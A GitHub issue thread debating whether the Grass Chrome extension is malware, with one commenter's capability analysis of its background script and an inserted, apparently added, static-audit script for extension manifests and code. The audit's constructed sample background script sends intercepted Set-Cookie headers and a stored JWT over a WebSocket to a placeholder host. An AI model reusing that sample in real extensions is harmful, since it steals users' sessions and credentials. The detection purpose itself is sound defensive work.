Malware? #1

Open
DearGods opened this issue Jun 23, 2024 · 3 comments

Comments

@DearGods

Hi @SunsetMkt

Check this

// the CursedChrome server with a HTTPS cert setup.

It seems like this: https://github.com/mandatoryprogrammer/CursedChrome

So Grass is malware?!

@SunsetMkt
Owner

SunsetMkt commented Jun 23, 2024

Actually, I've never read the code, but since you highlighted CursedChrome...

What Grass does is share your internet connection (to collect information for AI, according to their statement) with their server. It's possible (and reasonable by some means) that they could use your device as an HTTP proxy to achieve that.

The (possibly) malicious part is that CursedChrome may connect to your local network, and if you install it on a company computer, the requests will be sent from a trusted computer. Also, the host_permissions is "<all_urls>", which might mean that Grass has access to all host data, such as cookies, webRequest, and tabs (but there are some that it cannot access). It may have too many permissions, although it has to have so many permissions to do its work.

I suggest reading the whole code by yourself and doing the same to the latest version of the extension. For myself, I only install unknown extensions on an isolated browser.

@scientgg

To whom it may concern:
script: background.js

1. Cookie Access and Exfiltration:
   Cookie Handling:
   The script processes cookies directly by intercepting HTTP requests and responses using the chrome.webRequest API. It specifically extracts Set-Cookie headers from HTTP responses via the extractCookies function and stores them temporarily in CustomStorage.
   The getResponseCookies and setResponseCookies functions in the ResponseProcessor class manage cookies and can potentially send these cookies via the WebSocket connection to the remote server.

2. HTTP Request Interception:
   Custom Header Manipulation:
   The script can modify HTTP request headers using the performHttpRequest function. This includes headers that may carry authentication tokens, session IDs, or other sensitive information.
   By altering or injecting specific headers, the script could redirect or modify requests to gather sensitive information.
   Logging and Transport:
   Logs generated within the script, including potentially sensitive data, can be sent to a remote server using the LogsTransporter.sendLogs() function over a WebSocket connection. This means that any intercepted data, including cookies or other sensitive headers, can be exfiltrated.

3. Local Storage Access:
   Storage of Sensitive Data:
   The script accesses Chrome's localStorage for storing and retrieving data like user IDs, JWT tokens, and other identifiers. If these tokens or identifiers are related to authentication, they could be used to impersonate a user or access restricted resources.

4. WebSocket Communication:
   Data Transmission:
   The script is designed to maintain an active WebSocket connection to a remote server. Through this connection, it can send and receive various data, including potentially sensitive information that it has intercepted.

Conclusion:
Capability of Stealing Information: The script has the technical capability to steal cookies, passwords, or other sensitive information through its handling of HTTP requests, cookies, and local storage data. The WebSocket communication mechanism can be used to exfiltrate this information to a remote server.

Trust and Intent: Whether the script actually does this depends on the intent of the developers and the specific configuration of the Grass extension. If the app is designed and implemented with malicious intent, it could be used to steal sensitive data.
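The two comments above boil down to a checklist: a broad host scope (`<all_urls>`), a header-level `chrome.webRequest` listener that touches `Set-Cookie`, token-like keys in storage, and an outbound WebSocket to carry whatever was collected. The script below is an added example written for this page, not code from the Grass extension or from this thread: a small static audit you can run with Node against an unpacked extension's manifest and background script to surface exactly those combinations. The manifest and background script at the bottom are constructed samples (the hostname `relay.example.invalid` is a placeholder), not Grass's real files. One caveat the audit encodes: since Chrome 72, `Cookie` and `Set-Cookie` are stripped from `webRequest` header callbacks unless the listener opts in with `"extraHeaders"`, so a script that parses `Set-Cookie` without that opt-in does not actually see it there.

```javascript
// Added example for this thread, not code from the Grass extension: a static
// audit of an unpacked Chrome extension (manifest + background script) for the
// permission and API combinations the comments above describe. The manifest and
// script at the bottom are constructed samples, and relay.example.invalid is a
// placeholder hostname, not a real endpoint.

const BROAD_HOSTS = new Set(["<all_urls>", "*://*/*", "http://*/*", "https://*/*"]);

// Permissions whose impact is amplified by a broad host scope.
const SENSITIVE_PERMISSIONS = {
  webRequest: "observe request and response headers on matching hosts",
  webRequestBlocking: "modify or cancel requests on matching hosts",
  cookies: "read and write cookies via chrome.cookies on matching hosts",
  tabs: "read the URL and title of every open tab",
  declarativeNetRequest: "rewrite requests and headers declaratively",
};

// Source-level indicators. Each is a capability, not proof of intent.
const SOURCE_PATTERNS = [
  { id: "webrequest-header-listener",
    re: /chrome\.webRequest\.on(?:BeforeSendHeaders|SendHeaders|HeadersReceived)\.addListener/ },
  { id: "set-cookie-handling", re: /set-cookie/i },
  { id: "cookies-api", re: /chrome\.cookies\.(?:get|getAll|set)\s*\(/ },
  { id: "websocket-client", re: /new\s+WebSocket\s*\(/ },
  { id: "token-in-storage",
    re: /(?:localStorage\.(?:getItem|setItem)|chrome\.storage\.local\.(?:get|set))\s*\([^)]*(?:jwt|token|session)/i },
];

function auditManifest(manifest) {
  const findings = [];
  const perms = new Set(manifest.permissions || []);
  // MV2 lists host patterns under "permissions"; MV3 uses "host_permissions".
  const hosts = [...(manifest.host_permissions || []), ...perms].filter(
    (p) => BROAD_HOSTS.has(p) || p.includes("://"));
  const broad = hosts.some((h) => BROAD_HOSTS.has(h));
  if (broad) findings.push({ id: "broad-host-scope", detail: hosts.join(", ") });
  for (const [perm, why] of Object.entries(SENSITIVE_PERMISSIONS)) {
    if (perms.has(perm)) findings.push({ id: `perm-${perm}`, detail: why, amplified: broad });
  }
  return findings;
}

function auditScript(source) {
  const findings = SOURCE_PATTERNS.filter(({ re }) => re.test(source)).map(({ id }) => ({ id }));
  const ids = new Set(findings.map((f) => f.id));
  // Since Chrome 72, Cookie and Set-Cookie are omitted from webRequest header
  // callbacks unless the listener passes "extraHeaders" in extraInfoSpec.
  if (ids.has("webrequest-header-listener") && ids.has("set-cookie-handling")) {
    const optsIn = /["']extraHeaders["']/.test(source);
    findings.push({ id: optsIn ? "set-cookie-visible" : "set-cookie-not-visible" });
  }
  // Every ws:// or wss:// literal is a candidate exfiltration channel to review.
  const endpoints = [...new Set(source.match(/wss?:\/\/[^\s"'`)]+/g) || [])];
  return { findings, endpoints };
}

function auditExtension(manifest, source) {
  const manifestFindings = auditManifest(manifest);
  const { findings: scriptFindings, endpoints } = auditScript(source);
  const ids = new Set([...manifestFindings, ...scriptFindings].map((f) => f.id));
  const broad = ids.has("broad-host-scope");
  const seesSecrets = ids.has("set-cookie-visible") || ids.has("cookies-api") || ids.has("token-in-storage");
  const hasChannel = ids.has("websocket-client");
  let severity = "low";
  if (broad && ids.has("perm-webRequest")) severity = "medium";
  if (broad && seesSecrets && hasChannel) severity = "high";
  return { severity, findings: [...manifestFindings, ...scriptFindings], endpoints };
}

// Constructed sample manifest and background script (not Grass's files).
const SAMPLE_MANIFEST = {
  manifest_version: 3,
  name: "sample-bandwidth-sharer",
  permissions: ["webRequest", "storage", "alarms"],
  host_permissions: ["<all_urls>"],
  background: { service_worker: "background.js" },
};

const SAMPLE_BACKGROUND = `
const ws = new WebSocket("wss://relay.example.invalid/ws");
chrome.webRequest.onHeadersReceived.addListener(
  (details) => {
    const cookies = details.responseHeaders.filter((h) => h.name.toLowerCase() === "set-cookie");
    ws.send(JSON.stringify({ url: details.url, cookies }));
  },
  { urls: ["<all_urls>"] },
  ["responseHeaders", "extraHeaders"]
);
chrome.storage.local.get("jwt", (r) => ws.send(JSON.stringify({ jwt: r.jwt })));
`;

console.log(JSON.stringify(auditExtension(SAMPLE_MANIFEST, SAMPLE_BACKGROUND), null, 2));
```

To use it on a real extension, load the unpacked directory's `manifest.json` with `JSON.parse` and the background script (the `service_worker` in MV3, or the `background.scripts` files in MV2) as text, then call `auditExtension`. The severity is deliberately coarse: "high" only means the three ingredients (broad scope, visible secrets, outbound channel) coexist, which is the point at which reading the code by hand, as suggested earlier in the thread, is no longer optional.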

@DearGods
Author

Hi @scientgg, awesome analysis. You might want to check out https://github.com/security-chad/extension-analysis; it seems like Grass is messing with fire.
